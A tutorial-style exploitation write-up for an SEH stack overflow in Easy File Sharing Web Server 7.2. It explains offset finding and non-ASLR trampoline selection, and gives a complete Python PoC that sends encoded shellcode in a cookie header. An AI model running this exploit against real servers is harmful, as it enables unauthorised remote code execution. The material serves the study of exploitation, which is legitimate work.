Easy File Sharing Web Server 7.2: Vulnerability Analysis and Exploitation

1. Software overview

Easy File Sharing Web Server is a file-sharing system that lets visitors upload and download files through a browser.

2. Root cause

The password value is copied with a string copy whose length is never checked, so an over-long password overflows the destination buffer on the stack.
[Figure 1]

3. Exploitation

1. First send a request to the server to locate the overflow point. Tracing in WinDbg shows that the crash is triggered because the SEH record on the stack has been overwritten.
(WinDbg screenshot)
2. We therefore need a "pop pop ret" trampoline, which we locate with mona. Avoid addresses that contain 0x00, which would truncate the payload in transit; 0x0d and 0x0a are ruled out for the same reason, since the payload travels inside an HTTP header line. When the overwritten handler is invoked, [esp+8] holds the address of the overwritten SEH record, i.e. nSEH, so two pops followed by a ret land execution on nSEH. That is why nSEH holds a short jump that skips the handler address and continues into the shellcode.
[Figure 2]
First look for modules that do not have ASLR enabled, so that the trampoline address is the same on every run.
[Figure 3]
With that we can construct the exploit.
The memory layout is:
[Figure 4]
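The two steps above, finding the offset and assembling the SEH layout, as an added worked example in Python (constructed for this write-up, not code from the original post or from the Easy File Sharing Web Server project). It generates the cyclic pattern that pattern_create/pattern_offset use, maps a dword reported by WinDbg's !exchain back to its offset, builds the nSEH | SEH | NOP | shellcode layout of the PoC with struct.pack for the trampoline address, and then checks where the short jump lands and scans for bytes that would truncate the payload. The dwords 0x63413063 and 0x41396241 are what such a pattern places at offsets 61 and 57 (the page's offsets), the trampoline 0x1001a889 is the one from the PoC, and the 16-byte int3 block is a stand-in for real shellcode.

```python
"""Added example: locate the SEH overwrite offset with a cyclic pattern and
assemble/verify the nSEH | SEH | NOP | shellcode layout. Constructed for this
write-up; the crash dwords and the int3 shellcode are stand-ins."""
import itertools
import string
import struct

# Bytes the payload must not contain: 0x00 ends the string copy, and
# 0x0d / 0x0a end the HTTP header line that carries the cookie.
BAD_BYTES = b"\x00\x0d\x0a"


def cyclic_pattern(length):
    """pattern_create-style sequence Aa0Aa1Aa2...: every 4-byte window is
    unique, so a dword seen in the debugger maps back to exactly one offset."""
    triples = (u + l + d for u in string.ascii_uppercase
                         for l in string.ascii_lowercase
                         for d in string.digits)
    text = "".join(itertools.islice(triples, length // 3 + 1))
    return text[:length].encode()


def pattern_offset(pattern, dword):
    """Offset of a dword as WinDbg displays it (the bytes in memory are the
    little-endian encoding of that value)."""
    idx = pattern.find(struct.pack("<I", dword))
    if idx < 0:
        raise ValueError("0x%08x is not part of the pattern" % dword)
    return idx


def build_seh_payload(nseh_offset, trampoline, shellcode, nop_pad=3, jmp_disp=8):
    """Page layout: filler | nSEH (jmp short) | SEH (pop/pop/ret) | NOPs | shellcode.
    The trampoline is packed little-endian, which for 0x1001a889 gives the
    PoC's szAddress1 bytes 89 a8 01 10."""
    filler = b"A" * nseh_offset
    nseh = b"\xeb" + bytes([jmp_disp]) + b"\x90\x90"   # jmp short +disp, then padding
    seh = struct.pack("<I", trampoline)
    return filler + nseh + seh + b"\x90" * nop_pad + shellcode


def jmp_short_target(buf, nseh_offset):
    """Offset where a 'jmp short' placed at nseh_offset continues: the
    displacement is a signed byte relative to the end of the 2-byte opcode."""
    if buf[nseh_offset] != 0xEB:
        raise ValueError("nSEH does not start with a short jump")
    disp = struct.unpack_from("<b", buf, nseh_offset + 1)[0]
    return nseh_offset + 2 + disp


def check_payload(buf, nseh_offset):
    """Return a list of problems; an empty list means the layout is consistent."""
    problems = []
    for bad in BAD_BYTES:
        if bad in buf:
            problems.append("byte 0x%02x at offset %d" % (bad, buf.index(bad)))
    target = jmp_short_target(buf, nseh_offset)
    handler_end = nseh_offset + 8            # nSEH (4 bytes) + SEH (4 bytes)
    if not handler_end <= target < len(buf):
        problems.append("jmp short lands at %d, outside the NOP pad/shellcode" % target)
    return problems


if __name__ == "__main__":
    pat = cyclic_pattern(1000)
    # Constructed: the dwords !exchain would show after sending `pat` as PassWD.
    print("SEH handler 0x63413063 -> offset", pattern_offset(pat, 0x63413063))
    print("nSEH        0x41396241 -> offset", pattern_offset(pat, 0x41396241))
    payload = build_seh_payload(57, 0x1001a889, b"\xcc" * 16)
    print("jmp short lands at offset", jmp_short_target(payload, 57))
    print("problems:", check_payload(payload, 57))
```

With the page's values the short jump lands at offset 67, the last NOP of the three-byte pad, and the shellcode begins at 68; swapping in a trampoline such as 0x10000089 makes check_payload report the 0x00 bytes that the string copy would stop at.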

4. PoC

The PoC is written in Python:

import socket

host = "192.168.120.135"
port = 80

# 57 bytes of filler reach nSEH; the handler pointer follows at offset 61.
szFill = b"A" * 57    # 61-4

# nSEH: "jmp short +8" skips the handler address and lands on the NOP pad
# just before the shellcode.
szJmp = b"\xeb\x08\x90\x90"    # jmp 08

# SEH: trampoline found with mona in a module without ASLR (no 0x00 byte,
# so the address survives the string copy).
szAddress1 = b"\x89\xa8\x01\x10"    # 0x1001a889 : pop ebp # retn
szFillNop = b"\x90" * 3

# Shellcode: a short decoder stub followed by the payload XOR-encoded with
# 0x18, so that the bytes sent contain no 0x00.
szShellCode = (
    b"\x33\xC0\xE8\xFF\xFF\xFF\xFF\xC3\x58\x8D\x70\x1B\x33\xC9\x66\xB9"
    b"\x3A\x01\x8A\x04\x0E\x34\x18\x88\x04\x0E\xE2\xF6\x80\x34\x0E\x18"
    b"\xFF\xE6"
    b"\x78\x9B\xDC\x38\xF3\x4D\x5F\x7D\x6C\x48\x6A\x77\x7B\x59\x7C\x7C"
    b"\x6A\x7D\x6B\x6B\x18\x54\x77\x79\x7C\x54\x71\x7A\x6A\x79\x6A\x61"
    b"\x5D\x60\x59\x18\x6D\x6B\x7D\x6A\x2B\x2A\x36\x7C\x74\x74\x18\x55"
    b"\x55\x7D\x6B\x6B\x79\x7F\x7D\x5A\x77\x60\x59\x18\x5D\x60\x71\x6C"
    b"\x48\x6A\x77\x7B\x7D\x6B\x6B\x18\x50\x7D\x74\x74\x77\x38\xC9\xF6"
    b"\xAB\xBC\xDE\xA5\x18\xA1\xBF\xD7\xAA\x39\x18\xF0\x18\x18\x18\x18"
    b"\x43\x7C\x93\x2D\x28\x18\x18\x18\x93\x6E\x14\x93\x6E\x04\x93\x2E"
    b"\x93\x4E\x10\x4B\x4A\xF0\x0C\x18\x18\x18\x93\xE8\x95\x53\xAD\x4A"
    b"\x49\x4A\xE7\xC8\x42\x4B\x48\x4E\x4A\xF0\x73\x18\x18\x18\x4D\x93"
    b"\xF4\x9B\xF4\x14\x4A\x93\x4D\x10\x93\x6A\x24\x95\x2C\x2A\x93\x6E"
    b"\x60\x95\x2C\x0E\x93\x66\x04\x95\x24\x0F\x91\x65\xE4\x93\x66\x38"
    b"\x95\x24\x0F\x91\x65\xE0\x93\x66\x3C\x95\x24\x0F\x91\x65\xEC\x2B"
    b"\xD8\xF3\x19\x58\x93\x6D\xE0\x93\x2C\x9E\x95\x2C\x0E\x93\x65\x14"
    b"\x95\x67\xBE\xA1\x16\x18\x18\x18\xE4\xEB\xBE\x6D\xFE\x93\x6D\xEC"
    b"\x2B\xCA\x7E\x93\x0C\x5E\x93\x6D\xE4\x93\x24\x8E\x93\x4D\x10\x95"
    b"\x1C\x22\x42\x93\xFD\x45\xDA\x10\x18\x4D\x93\xF4\x9B\xF4\x10\x78"
    b"\x2B\xCA\x93\x5D\x08\x4A\x4A\x93\x45\x0C\x95\x6B\xDC\x4E\xE7\xC8"
    b"\x95\x53\xC8\x49\x48\xE7\x4D\x14\x2B\xCA\x4A\x95\x6B\xED\x4E\x95"
    b"\x6B\xF0\x4E\x4A\xE7\xC8\x95\x6B\xC4\x4E\xE7\x6D\x10\xE7\x4D\x14"
    b"\xE7\xC8\x79\x93\xFD\x45\xDA\x08\x18\x18"
)
buffer = szFill + szJmp + szAddress1 + szFillNop + szShellCode + b"\x90" * 1000

# HTTP GET request; the overflow travels in the PassWD value of the Cookie header.
request = b"GET /vfolder.ghp HTTP/1.1\r\n"
request += b"Host: " + host.encode() + b"\r\n"
request += b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36\r\n"
request += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\n"
request += b"Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4\r\n"
request += b"Cookie: SESSIONID=3672; UserID=PassWD=" + buffer + b"; frmUserName=; frmUserPass=;\r\n"
request += b"Connection: keep-alive\r\n"
request += b"If-Modified-Since: Thu, 06 Jul 2017 14:12:13 GMT\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.sendall(request + b"\r\n\r\n")    # blank line terminates the headers
s.close()

5. Conclusion

A program protected by ASLR can still be exploited through a module loaded into it that was built without ASLR: such a module keeps its preferred image base on every run, so a trampoline address inside it, like the 0x1001a889 used above, can be hard-coded in the exploit.
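How "a module without ASLR" is decided, as an added example in Python (constructed for this write-up, not code from the page or from the product): a module opts in to ASLR through the IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE flag (0x0040) in the DllCharacteristics field of its PE optional header, which is the same flag a debugger's module listing summarizes. The code reads that field from a PE32 or PE32+ image and flags modules whose addresses can be hard-coded; the fake_pe helper and the module names are constructed so that it runs offline. One caveat the page does not address: for an SEH trampoline the module must also lack SafeSEH (a /SAFESEH handler table), which this check does not cover.

```python
"""Added example: read DllCharacteristics from a PE header to tell whether a
module opted in to ASLR. Constructed for this write-up; fake_pe builds
header-only images so the check can be exercised without real DLLs."""
import struct

IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040   # ASLR opt-in
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100      # DEP opt-in


def dll_characteristics(data):
    """Return (ImageBase, DllCharacteristics) parsed from a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    opt = e_lfanew + 4 + 20                 # skip signature and IMAGE_FILE_HEADER
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:                      # PE32: 32-bit ImageBase at offset 28
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == 0x20B:                    # PE32+: 64-bit ImageBase at offset 24
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics sits at offset 70 of the optional header in both formats.
    chars = struct.unpack_from("<H", data, opt + 70)[0]
    return image_base, chars


def is_aslr_exempt(data):
    """True when DYNAMIC_BASE is clear: the module loads at its preferred base
    (unless that range is already taken), so its addresses are stable."""
    _, chars = dll_characteristics(data)
    return not (chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)


def non_aslr_modules(modules):
    """modules: {name: image bytes}. Returns the names usable for hard-coded addresses."""
    return [name for name, data in modules.items() if is_aslr_exempt(data)]


def fake_pe(image_base, chars, pe32plus=False):
    """Construct a minimal header-only PE image (for testing only)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew
    opt_size = 112 if pe32plus else 96                # optional header without data directories
    file_hdr = bytearray(20)
    struct.pack_into("<H", file_hdr, 16, opt_size)    # SizeOfOptionalHeader
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    if pe32plus:
        struct.pack_into("<Q", opt, 24, image_base)
    else:
        struct.pack_into("<I", opt, 28, image_base)
    struct.pack_into("<H", opt, 70, chars)
    return bytes(dos + b"PE\0\0" + file_hdr + opt)


if __name__ == "__main__":
    # Constructed sample: one module without ASLR at the classic 0x10000000
    # DLL base, one module with ASLR and DEP opted in.
    sample = {
        "constructed_noaslr.dll": fake_pe(0x10000000, 0x0000),
        "constructed_aslr.dll": fake_pe(0x6B000000, IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE
                                        | IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
    }
    for name, data in sample.items():
        base, chars = dll_characteristics(data)
        print("%-24s base=0x%08x DllCharacteristics=0x%04x ASLR=%s"
              % (name, base, chars, bool(chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)))
    print("trampoline candidates:", non_aslr_modules(sample))
```

On a real target the same function is fed the bytes of each DLL loaded into the server process; a module without DYNAMIC_BASE is the one whose pop/pop/ret address can be written into the PoC as a constant.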
